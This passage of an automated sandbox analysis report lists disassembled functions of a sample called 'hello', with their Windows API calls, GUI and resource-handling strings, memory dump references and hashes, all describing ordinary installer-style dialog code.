Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401E05
lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
GetMenu.USER32(?), ref: 00401E44

Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
CoInitialize.OLE32(00000000), ref: 00401E8C
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
GlobalFree.KERNEL32(00000000), ref: 00401ECD

Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC

GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
GlobalFree.KERNEL32(00000000), ref: 00401F3A

Strings

STATIC, xrefs: 00401E13
IMAGES, xrefs: 00401E4E

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68

Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetDlgItem.USER32(?,000004B8), ref: 0040816A
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
GetDlgItem.USER32(?,000004B5), ref: 004081C0
GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
GetDlgItem.USER32(?,000004B5), ref: 004081D5
SetWindowLongW.USER32(00000000), ref: 004081D8
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
GetDlgItem.USER32(?,000004B4), ref: 0040821A
SetFocus.USER32(00000000), ref: 0040821D
SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
GetDlgItem.USER32(?,00000002), ref: 00408294
IsWindow.USER32(00000000), ref: 00408297
GetDlgItem.USER32(?,00000002), ref: 004082A7
EnableWindow.USER32(00000000), ref: 004082AA
GetDlgItem.USER32(?,000004B5), ref: 004082BE
ShowWindow.USER32(00000000), ref: 004082C1

Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142

Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID:
API String ID: 855516470-0
Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C

Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
strncmp.MSVCRT ref: 004031F1
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

Strings

hAA, xrefs: 0040309E
{\rtf, xrefs: 004031D6, 004031EB
MiscFlags, xrefs: 004032C0
SetEnvironment, xrefs: 0040326B
GUIFlags, xrefs: 004032B2

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$lstrcmpstrncmp
String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
API String ID: 2881732429-172299233
Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59

Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00406A69
GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
GetDlgItem.USER32(?,000004B4), ref: 00406AA5
GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
GetSystemMetrics.USER32(00000010), ref: 00406B0B
GetSystemMetrics.USER32(00000011), ref: 00406B11
GetSystemMetrics.USER32(00000008), ref: 00406B18
GetSystemMetrics.USER32(00000007), ref: 00406B1F
GetParent.USER32(?), ref: 00406B43
GetClientRect.USER32(00000000,?), ref: 00406B55
ClientToScreen.USER32(?,?), ref: 00406B68
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
GetClientRect.USER32(?,?), ref: 00406C55
ClientToScreen.USER32(?,?), ref: 00406B71

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

GetSystemMetrics.USER32(00000008), ref: 00406CD6
GetSystemMetrics.USER32(00000007), ref: 00406CDD

Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64

Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
LoadIconW.USER32(00000000), ref: 00407D33
GetSystemMetrics.USER32(00000032), ref: 00407D43
GetSystemMetrics.USER32(00000031), ref: 00407D48
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
LoadImageW.USER32(00000000), ref: 00407D54
SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
GetWindow.USER32(?,00000005), ref: 00407E76
GetWindow.USER32(?,00000005), ref: 00407E92
GetWindow.USER32(?,00000005), ref: 00407EAA
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
LoadIconW.USER32(00000000), ref: 00407F0D
GetDlgItem.USER32(?,000004B1), ref: 00407F28
SendMessageW.USER32(00000000), ref: 00407F2F

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 1889686859-0
Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF

Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00406F45
GetWindowLongW.USER32(00000000), ref: 00406F4C
DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
GetSystemMetrics.USER32(00000031), ref: 00406F91
GetSystemMetrics.USER32(00000032), ref: 00406F98
GetWindowDC.USER32(?), ref: 00406FAA
GetWindowRect.USER32(?,?), ref: 00406FB7
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
ReleaseDC.USER32(?,00000000), ref: 00406FF3

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64

Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040678E
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
GetDlgItem.USER32(?,000004B4), ref: 004067AB
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
GetDlgItem.USER32(?,?), ref: 004067CC
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
GetDlgItem.USER32(?,?), ref: 004067DD
SetFocus.USER32(00000000,?,000004B4,771B0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28

Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603

Strings

IA, xrefs: 0040C4C6
IA, xrefs: 0040C66E
IA, xrefs: 0040C74D
IA, xrefs: 0040C4D9
IA, xrefs: 0040C65E
IA, xrefs: 0040C4AF

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@
String ID: IA$IA$IA$IA$IA$IA
API String ID: 613200358-3743982587
Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58

Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479

Strings

FinishMessage, xrefs: 00408417, 00408433
WarningTitle, xrefs: 0040853A
HelpText, xrefs: 00408598
ErrorTitle, xrefs: 00408511
BeginPrompt, xrefs: 004084A4, 004084A9
SetEnvironment, xrefs: 004083BC

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@
String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
API String ID: 613200358-994561823
Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E

Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
GetDC.USER32(00000000), ref: 00406DFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
ReleaseDC.USER32(00000000,?), ref: 00406E24
GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65

Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040696E
GetSystemMetrics.USER32(0000000B), ref: 0040698A
GetSystemMetrics.USER32(0000003D), ref: 00406993
GetSystemMetrics.USER32(0000003E), ref: 0040699B
SelectObject.GDI32(?,?), ref: 004069B8
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
SelectObject.GDI32(?,?), ref: 004069F9
ReleaseDC.USER32(?,?), ref: 00406A08

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40

Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
GetDlgItem.USER32(?,000004B8), ref: 00407B8B
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
wsprintfW.USER32 ref: 00407BBB
??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Strings

%d%%, xrefs: 00407BB5

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59

Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4

Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

